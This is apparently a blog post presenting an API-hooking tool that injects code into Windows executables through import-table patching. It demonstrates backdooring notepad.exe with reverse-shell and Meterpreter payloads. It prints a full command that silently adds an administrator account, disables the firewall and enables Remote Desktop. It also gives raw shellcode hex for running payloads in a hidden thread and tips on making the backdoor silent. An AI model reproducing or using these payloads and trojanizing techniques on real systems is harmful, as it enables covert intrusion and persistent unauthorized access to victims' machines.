API Hooking tool injecting code in the PE: tool explanation and application examples..

Hello again.. There was a long time since my last post, cos i was busy with several issues, but most time with this tool.. Checking it’s operation, testing the hooked PE in different OSs, changing the method used, etc..

Finally i came up with this tool, and below i will explain exactly how it works, give you the source code and a binary, and show you some applications of this tool with video and/or shots…

This is an API hooking tool, which uses the PE IAT patch method, and runs the payload, injecting the code in the PE permanently, changing the PE Header apropriately (section sizes, OEP, ..) The final executable produced (hooked, and code-injected) tested on most OSs:

    • Windows 7 x64 – SUCCEED
    • Windows 7 x32 – SUCCEED
    • Windows 2008 x32 – SUCCEED
    • Windows 2000 – FAILED (The VEH APIs not supported by OSs <= Win2k)
    • Windows 2003 x32 – SUCCEED
    • Windows XP x32 – SUCCEED
    • MAC OS running wine – SUCCEED

Here is the tool! CPP Source with injected asm (i could say ASM with injected cpp 😛 ) and the compiled .exe .. if you don’t trust me to run binary 😛 just cl hooking.cpp /w and you got it 🙂

Hooking.zip – Get it!

What did I use to do it, was just some VMs to test it in different environments, and:

And ofcourse for the IAT and EAT of the PE Structure, I visited IcZelion’s guides (IAT, EAT) and used those methods in this tool.. Also I use the PEB method to obtain the Kernel Base in runtime on standalone codes, method used by most shellcodes.

Why whould you need an API Hooker ?? There are several reasons.. like :

  • Backdoor files
  • Change the API parameters on runtime
  • Spy API execution on specific process
  • etc

The method used from this tool, is physical modifying the Import Table of the PE, and patching/injection the user’s code so it is executed right BEFORE the API execution begins.. The tool just asks you which API you want to hook, and which is the file with the raw data (asm binary code) that will be inserted before the api execution.. The code that will be inserted must, for sure, be absolutely stand alone, what means that it must keep stack calibrated, must not refer to memory location out of the code (except from locals made in stack or imported functions from PEB) .. You have to know what you’re doing 🙂

BUT.. there is also another option of the tool. You can use the Exception Handling option.. which enables you to use code that may cause exceptions, code that does not manage it’s stack well, and maybe some 3rd party code.. This option, uses VEH (Vectored exception handling), installing the handler before your code execution, and removing the handler after the execution of your code, or after your code causes an exception.. Also the stack is being saved, so you dont have to care about the EBP and ESP values 🙂 The whole consept will be explained.

Here are two very nice and easy to understand API Hooking papers by Brian Mariani from High-Tech Bridge SA, published in exploit-db :

http://www.exploit-db.com/download_pdf/17802

http://www.exploit-db.com/download_pdf/17671

I will try to explain some basic things about how my tool is working. I hope you understand.. You can make your comments ofcourse! 🙂 Here are some Images about the operation.. :

 

Basic Hooking tool explanation

Basic Hooking tool explanation

 

 

 

 

 

 

 

 

 

 

 

 

If you select not to use VEH, and you make a standalone payload with calibrated stack, then the implementation is very simple, as explained in the previous image.. When you select to use VEH, your payload will be shielded by an exception handler, and the injected code will be much more complicated, and the structure of the injected code for VEH and when your payload will be executed, can be cleared by the following image!

The VEH Code structure:

Vectored Exception Handling Additional Code Structure

Vectored Exception Handling Additional Code Structure

 

 

 

 

 

 

 

 

 

 

 

 

 

Now in order to understand the tool in practice, i made some videos doing some simple but practical examples.. I’ll enumerate them here :
1. Hooking the “About” window of notepad.exe with the following payloads:
    •    WinExec : calc.exe (EXIT FUNCTION:NONE)
    •    WinExec : Windows Add admin user & enable RDP & Disable F/W (EXIT FUNC: none)
    •    Windows Reverse Shell (EXIT FUNC: seh) – Thread Code included
2. Hooking the Windows “ping.exe” with custom asm code changing the icmp echo message..
3. Notepad.exe : ShellAboutW : Windows Meterpreter reverse : Doesn’t work with any exitfunc (it destroys the process) so I use Custom ASM Code creating Thread (like the 1.c. step with Reverse Shell).. You can use this example code to run payloads and backdoors in a new thread.. So you’ll wonder why you didn’t group it in the 1st section with all other payloads? I didn’t cos it needed some more time..  Read more about this below..

 

<>================[ Videos and Descriptions.. ]==================<>

 

 

1) a. The notepad.exe hooked on ShellAboutW with a WinExec payload to run calc with EXITFUNC=none with no VEH
In this video you’ll see:
  • Compilation of hooking.cpp
  • Use of hooking.exe to show some imports
  • Creation of payload for winexec “calc” and exitfunc=none
  • Use of that payload with hooking.exe to hook notepad

and in this video I used VEH to handle the exception caused by the payload.. Also i play around with some other exitfuncs and veh/without veh, without specific reason.. only VEH makes the difference… :

 

 

 

1) b. In the next vid I show the same logic as previously.. I use VEH cos WinExec payload after execution, tries to execute the text area (the command text) and provokes exceptions.. The interesting part here is the command that adds an administrator user (user “adm”), disables firewall, and enables Remote Desktop silently by just looking the about of notepad..
The command is :
cmd /c net user adm 1234 /add && net localgroup administrators adm /add && netsh firewall set opmode disable && reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
..ofc the user who will execute this command/payload must have admin privs… ;p
But there is a problem running this payload… is not exactly “silent” … I also show how you can make it silent by changing the payload manually 😉

 

 

1)  c. Windows Reverse Shell :

Now things are being complicated.. We’ll talk for the reverse shell (more practical for remote scenarios via internet & nat). If we use the tool as is, the about window will not appear immediately. The program will try to make a connection to the IP hardcoded in the RShell payload.. If it will connect, it will give the shell and About dialog will appear when the reverse tcp connection will end.. But if the IP and port that it wants to connect is invalid, the About dialog will appear after the TIMEOUT of the connection. We don’t like such backdoor cos it must be executed silently. To do it, we have to make it in a seperate thread.. Below I show the 1st method (without a thread) and the 2nd too (with thread) and how to implement such code… Using the code below, you execute any payload in a seperate thread, and it’s absolutely stand alone (full kernelbase finding+exports finder included in the code).. Here is the video, and after the video i have the code used (raw data), so you can copy/paste it in your binary.

 

Raw-code used for the Thread implementation of the video… :

>> Header of the code:

E8 00 00 00 00 59 83 C1 0C 81 C1 EF BE AD DE FF E1

size: 3A 01 00 00 (change EF BE AD DE to the size of payload in little endian) … [PAYLOAD TO BE RUN IN THREAD] …

>> Necessary Code for thread implementation:

E9 4B 01 00 00 55 8B EC 56 56 33 C0 64 8B 40 30 85 C0 78 0F 3E 8B 40 0C 3E 8B 70 1C AD 3E 8B 40 08 EB 0B 3E 8B 40 34 8D 40 7C 3E 8B 40 3C 5E 83 C4 04 5D C3 55 8B EC 51 36 8B 45 08 36 8B 4D 08 3E 81 38 50 45 00 00 74 15 2B C8 F7 D9 81 F9 00 03 00 00 7F 05 83 C0 04 EB E2 33 C0 EB 0C 2B C8 F7 D9 36 03 4D 08 36 89 4D EC 59 8B E5 5D C3 55 8B EC 53 51 53 BB 78 65 6C 41 33 C9 36 8B 45 08 3E 32 1C 08 3E 80 3C 08 00 74 06 C1 C3 08 41 EB EF 8B C3 5B 59 5B 5D C3 55 8B EC 83 EC 08 53 56 57 36 C7 45 FC 00 00 00 00 36 C7 45 F8 00 00 00 00 60 36 8B 45 0C 50 E8 78 FF FF FF 83 C4 04 3E 8B 40 78 36 8B 75 0C 03 F0 36 89 75 F8 8B FE 3E 8B 4E 18 3E 8B 76 24 3E 8B 7F 20 36 03 75 0C 36 03 7D 0C 36 8B 55 FC 3E 8B 1C 3A 36 03 5D 0C 53 E8 7A FF FF FF 83 C4 04 36 83 45 FC 04 36 8B 55 08 49 3B C2 74 06 85 C9 74 35 EB D7 36 83 6D FC 04 36 8B 45 FC D1 E8 66 3E 8B 04 30 36 8B 75 F8 3E 8B 76 1C 36 03 75 0C 25 FF FF 00 00 C1 E0 02 3E 8B 04 30 36 03 45 0C 36 89 44 24 1C EB 09 36 C7 44 24 1C 00 00 00 00 61 5F 5E 5B 8B E5 5D C3 E8 B0 FE FF FF 50 68 3D 08 3C 33 E8 38 FF FF FF E8 00 00 00 00 59 81 E9 65 01 00 00 81 E9 EF BE AD DE 31 DB 53 53 53 51 53 53 FF D0 90

 

 

2. Ping Echo message hooking

In this sample i hook the IcmpSendEcho2 API of iphlpapi.dll in ping.exe, so the echo messages sent, are changed to a custom message.. details in video…

the raw-code used as payload, is here.. :

50 8B 44 E4 1C C7 00 31 33 33 74 C7 40 04 73 65 63 20 C7 40 08 63 75 73 74 C7 40 0C 6F 6D 20 65 C7 40 10 63 68 6F 20 C7 40 14 70 69 6E 67 C7 40 18 20 6D 65 73 C7 40 1C 73 61 67 65 C7 40 20 21 21 20 3A C6 40 24 00 58

 

 

 

 3. Meterpreter Reverse in a Thread (notepad.exe hooked on ShellAboutW)

In this video i show how to hook again ShellAboutW with meterpreter payload in a thread (using the code from 1.c. ) ..But here things are different. Meterpreter does not handle the “EXITFUNC” and it always calls “ExitProcess” as a result the Termination of whole application (and not only of a thread as we expected). Read the here details about that issue.. So when meterpreter doesn’t find the IP to connect to, or the port is refusing connection, it kills the whole process after 5 retries…

In the video below, i hook in notepad.exe a meterpreter payload with thread code, watching that it kills the whole process, and then patching the payload in order to a) make more tries to connect b) call RtlExitUserThread instead of ExitProcess..

If you have questions about the code i use, read the descriptions of 2 videos before.. 🙂

Bookmark the permalink.

3 Responses to API Hooking tool injecting code in the PE: tool explanation and application examples..

  1. Pingback: binary tools | Pearltrees

  2. Pingback: Outils, services, sites à (re)découvrir 2012 S04 | La Mare du Gof

  3. x4r0r says:

    Hello , good ,article , i have a problem with the next download , do not understand it very well …

    http://msdn.microsoft.com/en-us/library/9s7c9wdw(v=vs.71).aspx

Leave a Reply

Your email address will not be published. Required fields are marked *